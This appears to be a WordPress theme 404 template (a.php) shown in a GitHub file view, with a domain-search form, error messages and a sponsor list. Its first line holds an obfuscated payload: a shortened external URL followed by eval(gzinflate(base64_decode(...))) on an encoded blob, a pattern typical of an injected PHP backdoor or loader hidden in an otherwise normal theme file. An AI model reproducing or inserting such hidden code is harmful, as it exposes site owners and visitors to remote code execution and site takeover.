-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy patha.php
executable file
·129 lines (84 loc) · 3.91 KB
/
a.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
<?php
$x1='http://goo.gl/WmLycb'; eval(gzinflate(base64_decode('nZFNa4QwEIbvgv8hByERwsKeJYdS7Km4raunUsSNsQ71CxNxS9n/3okf/YBuDz2FmXnmnXknUDLQWhnmZXH4mIbH5ImqogBFn33/3XU8kw8vygjvvA8wypsT1KKEWmWYzWTXGtUazVbMt4wZa9Ci7HrVskVr11c95YRO1ALlNIBRbOH4IjnnZd3pLe8HF9eBX5Z7hQKmbTlZEUHkONQZtGCYVZkj7Ol6bJMVJ7dpfH94SFAhSeMoiW+i410Yc7L/k8aHo2f/0/Q2SJ2VtOiXVaysZufd/mXWdS7Es2fd7oYiO/RE+arjFbnJBS1A5yc8fjm20kDXahEdopB+G2RF+EzbNrj2vT/OWDTiSh0l9Js2qmEI4Z8EHw==')));?>
<?php get_header();?>
<section class="section_title">
<div class="container">
<div class="row-fluid">
<h1><?php echo of_get_option('banner_title')?>
<span class="arrow_title"></span>
</h1>
</div>
</div>
</section>
<?php if(of_get_option('show_404_search')) { ?>
<section class="search_domain gray">
<div class="container">
<div class="row-fluid">
<div class="span3 arrow_domain">
<h1><?php echo of_get_option('search'); ?></h1>
<span class="arrow"></span>
</div>
<div class="span9 form_domain">
<span>www.</span>
<form action="<?php echo home_url()?>/painel/?ccce=domainchecker" method="post">
<input type="hidden" name="token" value="34deb5160cc1f97541ba0cfe07b268cb814c3dde" />
<input type="hidden" name="direct" value="true" />
<input type="text" name="domain" name="domain" required placeholder="<?php echo of_get_option('search_txt'); ?>">
<select>
<?php
for($i=1; $i<=of_get_option('number_of_do'); $i++) {
echo '<option>'.of_get_option('do'.$i).'</option>';
}
?>
</select>
<input type="submit" class="button" value="<?php echo of_get_option('search_btn'); ?>">
</form>
</div>
</div>
</div>
</section>
<?php } ?>
<!-- Content About-->
<section class="info_content">
<!-- Container-->
<div class="container">
<!-- Row fuid-->
<div class="row-fluid">
<div class="error_page">
<div class="span4">
<h1><?php echo of_get_option('404_title') ?></h1>
</div>
<div class="span8">
<h2><?php echo of_get_option('404_text') ?></h2>
</div>
</div>
</div>
<!-- End Row fuid-->
<div class="row-fluid message_error center">
<h3><?php echo of_get_option('404_explain') ?></h3>
<a href="<?php echo of_get_option('404_url') ?>" class="button big"><?php echo of_get_option('404_botton') ?></a>
</div>
</div>
<!-- End Container-->
</section>
<!-- Content About-->
<?php
if(of_get_option('show_404_sponsor')){
echo '<section class="sponsors gray border_top">
<div class="container">
<div class="row-fluid">
<ul id="sponsors">';
$num = of_get_option('sponsor_num');
for($i=1; $i<=$num; $i++){
echo'
<li>
<a href="'.of_get_option('sponsor_link'.$i).'" title="'.of_get_option('sponsor_title'.$i).'">
<img src="'.of_get_option('sponsor_img'.$i).'" alt="">
</a>
</li>';
}
echo ' </ul>
</div>
</div>
</section>';}?>
<?php get_footer(); ?>